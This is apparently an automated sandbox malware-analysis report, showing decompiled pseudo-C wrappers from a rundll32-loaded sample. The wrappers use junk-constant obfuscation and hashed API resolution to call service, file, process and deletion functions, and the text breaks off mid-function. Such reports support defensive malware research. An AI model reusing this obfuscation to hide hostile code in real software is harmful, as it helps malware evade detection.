                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                    • String ID: WF
                                                                                                                                    • API String ID: 1889721586-2390014890
                                                                                                                                    • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                    • Instruction ID: 9e92c99d2ec2c792fba0d9d77cef1fcc31d9c2b8df609fe1a21bae15fab56b58
                                                                                                                                    • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                    • Instruction Fuzzy Hash: 3F016971911108FBEB14CB95DD4ACEFBFB8EF95714F108099F404A7200D3B15F649AA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 255 2042c4-204345 call 2120b9 call 21aa30 OpenServiceW
                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E002042C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t24;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_t34 = __edx;
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t24);
                                                                                                                                    				_v8 = 0x971c9e;
                                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                                    				_v8 = _v8 + 0xbdaa;
                                                                                                                                    				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                                    				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                                    				_v12 = 0x762558;
                                                                                                                                    				_v12 = _v12 | 0xdc63e739;
                                                                                                                                    				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                                    				E0021AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                                    				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                                    				return _t29;
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00214A8F,?,?,2635DC09), ref: 0020433F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: OpenService
                                                                                                                                    • String ID: X%v
                                                                                                                                    • API String ID: 3098006287-3430654708
                                                                                                                                    • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                    • Instruction ID: ef2c10c397b5e6a84589cf50b26f333a963e5876b9c25c50bb5724e8bbe8e8ac
                                                                                                                                    • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                    • Instruction Fuzzy Hash: 520104B681120CFBDF15DFD4D9468DEBF79EF14314F148188F90562221E2729B609B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 260 208f65-209010 call 2120b9 call 21aa30 CreateFileW
                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                    			E00208F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				void* _t32;
                                                                                                                                    				void* _t38;
                                                                                                                                    
                                                                                                                                    				_push(_a40);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_a32);
                                                                                                                                    				_push(_a28);
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t32);
                                                                                                                                    				_v28 = 0xee6fdc;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v12 = 0x957ab3;
                                                                                                                                    				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                                    				_v12 = _v12 + 0xffff8488;
                                                                                                                                    				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                                    				_v8 = 0xf6b813;
                                                                                                                                    				_v8 = _v8 + 0xffff9c70;
                                                                                                                                    				_v8 = _v8 + 0xffff858c;
                                                                                                                                    				_v8 = _v8 ^ 0x00f72129;
                                                                                                                                    				E0021AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                                    				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                                    				return _t38;
                                                                                                                                    			}










                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00209009
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                    • Instruction ID: 986cf4d4ade6bb8369047f35c169b22fdbcd96e197a702d8f2d42932fc43d8ab
                                                                                                                                    • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                    • Instruction Fuzzy Hash: 59111672901219FBCF219FA9DD098DFBFB6EF58354F118188F90862121D3328A65EB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 265 207f5d-207ff1 call 2120b9 call 21aa30 CreateProcessW
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0020AD99,?,?,?,181C8C04,0020AD99), ref: 00207FEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction ID: 71e710dab8cd55bcd52c1916bdd9d62a8592644ee3d50f81e78666b11d2994ef
                                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction Fuzzy Hash: DC11D672402118BBDF619F91DD09CDF7FB9EF193A4F145144F91921121D2728AA0EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 270 204ddd-204e73 call 2120b9 call 21aa30 SHFileOperationW
                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                    			E00204DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				void* _t30;
                                                                                                                                    				int _t38;
                                                                                                                                    				signed int _t40;
                                                                                                                                    				signed int _t44;
                                                                                                                                    				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t45 = __edx;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002120B9(_t30);
                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                    				_v24 = 0x8324bd;
                                                                                                                                    				_v20 = 0xe59c0f;
                                                                                                                                    				_v12 = 0xfa6a5a;
                                                                                                                                    				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                                    				_t40 = 0x1a;
                                                                                                                                    				_push(0x3771311d);
                                                                                                                                    				_push(_t40);
                                                                                                                                    				_v12 = _v12 * 0x42;
                                                                                                                                    				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                                    				_v8 = 0x460bc4;
                                                                                                                                    				_v8 = _v8 | 0x3946640e;
                                                                                                                                    				_push(0xdf0d4f1a);
                                                                                                                                    				_v8 = _v8 / _t40;
                                                                                                                                    				_v8 = _v8 + 0x2a2;
                                                                                                                                    				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                                    				_t44 = 0x58;
                                                                                                                                    				E0021AA30(_t44);
                                                                                                                                    				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                                    				return _t38;
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00204E6D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileOperation
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3080627654-0
                                                                                                                                    • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                    • Instruction ID: 526faa5727a33fffe157683532dded3d7e9f778e117eab8b91519380d2aa50f9
                                                                                                                                    • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                    • Instruction Fuzzy Hash: B60139B5E01209FBCB14EFA4D9469DEBFB4EF44314F10C088E904A6251D3744B549B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00205DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                    				unsigned int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t21;
                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t30;
                                                                                                                                    				void* _t31;
                                                                                                                                    				void* _t33;
                                                                                                                                    				intOrPtr _t34;
                                                                                                                                    
                                                                                                                                    				_t31 = __edx;
                                                                                                                                    				_t34 = __ecx;
                                                                                                                                    				E002120B9(_t21);
                                                                                                                                    				_v12 = 0x9fac18;
                                                                                                                                    				_v12 = _v12 ^ 0x90454497;
                                                                                                                                    				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                                    				_v8 = 0x647eb;
                                                                                                                                    				_v8 = _v8 >> 0xd;
                                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                                    				_v8 = _v8 + 0xffff0b9f;
                                                                                                                                    				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                                    				_t25 = E0021AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                                    				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                                    				return _t26;
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00205E58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileHandleInformation
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3935143524-0
                                                                                                                                    • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                    • Instruction ID: 55ad50b38917fc216786ef678d8ce6647231d0161cf1b8246567bb835d613b51
                                                                                                                                    • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                    • Instruction Fuzzy Hash: A401BC76941208BBDB24DE90CC0AEEEBFB4EF55314F108088F50466250E3B05B609BA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 280 201e22-201ea6 call 2120b9 call 21aa30 RtlAllocateHeap
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00201E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t27;
                                                                                                                                    				void* _t34;
                                                                                                                                    				signed int _t36;
                                                                                                                                    				long _t42;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t42 = __ecx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t27);
                                                                                                                                    				_v12 = 0x309d17;
                                                                                                                                    				_v12 = _v12 | 0x1b560655;
                                                                                                                                    				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                                    				_v8 = 0xa187d;
                                                                                                                                    				_v8 = _v8 + 0xa972;
                                                                                                                                    				_t36 = 0x67;
                                                                                                                                    				_v8 = _v8 / _t36;
                                                                                                                                    				_v8 = _v8 << 7;
                                                                                                                                    				_v8 = _v8 ^ 0x000b519a;
                                                                                                                                    				E0021AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                                    				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                                    				return _t34;
                                                                                                                                    			}


                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,002080DB,?,00000000,AF136809), ref: 00201EA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                    • Instruction ID: caf38cf2a2107148930be461896c4af04c477aa7a1505b04b6cb34ee7cfc2e17
                                                                                                                                    • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                    • Instruction Fuzzy Hash: FE014876901108FBEB05DFD4DC0A8DE7BB5EF45354F208089F90856211E7B29F60AB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 285 2146bb-21473b call 2120b9 call 21aa30 SHGetFolderPathW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002146BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                    				void* _t26;
                                                                                                                                    
                                                                                                                                    				E002120B9(_t21);
                                                                                                                                    				_v20 = 0x3f5bb0;
                                                                                                                                    				_v16 = 0;
                                                                                                                                    				_v12 = 0x996874;
                                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                                    				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                    				_v8 = 0xebf0af;
                                                                                                                                    				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                    				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                    				_t25 = E0021AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                    				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                    				return _t26;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00214735
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction ID: 1d84fc5648d0791abb321777bca2e6754917587114b5c066f8c489f5b6383f02
                                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction Fuzzy Hash: 7F012C75802218BBCF25AFD5DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E002093ED() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    
                                                                                                                                    				_v28 = 0xda6c64;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v12 = 0x88a564;
                                                                                                                                    				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                    				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                    				_v8 = 0xd9241f;
                                                                                                                                    				_v8 = _v8 * 0x5c;
                                                                                                                                    				_v8 = _v8 + 0xccdd;
                                                                                                                                    				_v8 = _v8 + 0x903;
                                                                                                                                    				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                    				E0021AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                    				ExitProcess(0);
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0020945B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction ID: e228a2f23e79f4b2d9532255e0864c5061b82ee38a78e6ff9523081d901c8e49
                                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction Fuzzy Hash: 8CF03C71901308FBEB04DBE8DA4699DFBF4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E00211F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t19;
                                                                                                                                    				int _t25;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t19);
                                                                                                                                    				_v12 = 0x96b134;
                                                                                                                                    				_v12 = _v12 + 0xdeb4;
                                                                                                                                    				_v12 = _v12 | 0x0c5d8169;
                                                                                                                                    				_v12 = _v12 ^ 0x0cdc4dba;
                                                                                                                                    				_v8 = 0xf8ae2a;
                                                                                                                                    				_v8 = _v8 + 0xcab3;
                                                                                                                                    				_v8 = _v8 * 0x2b;
                                                                                                                                    				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                                    				E0021AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                                    				_t25 = DeleteFileW(_a4); // executed
                                                                                                                                    				return _t25;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00211FF5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                    • Instruction ID: f2d869842e856bae364c5ca25221bba4536057b0b3dfd06f0dd81e2a69a21b2d
                                                                                                                                    • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                    • Instruction Fuzzy Hash: 99F037B1811208FBDB18EF90D9468EEBFF4EB50304F208299E40466222E3715F989B81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                    			E00218F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                    				unsigned int _v8;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				void* _t19;
                                                                                                                                    				int _t24;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t19);
                                                                                                                                    				_v12 = 0xd87912;
                                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                                    				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                                    				_v8 = 0xf5ad8e;
                                                                                                                                    				_v8 = _v8 + 0xc481;
                                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                                    				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                                    				E0021AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                                    				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                                    				return _t24;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00219002
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleService
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1725840886-0
                                                                                                                                    • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                    • Instruction ID: af687aad1a30d7990b1e1d97221e2c897e99e48a1841b1e794f1fd39948d7217
                                                                                                                                    • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                    • Instruction Fuzzy Hash: C9F0F9B591120CFFDF05AFD4C94A89EBBB4EB24308F208198F80562611E6769B68EF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E00215BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				void* _t20;
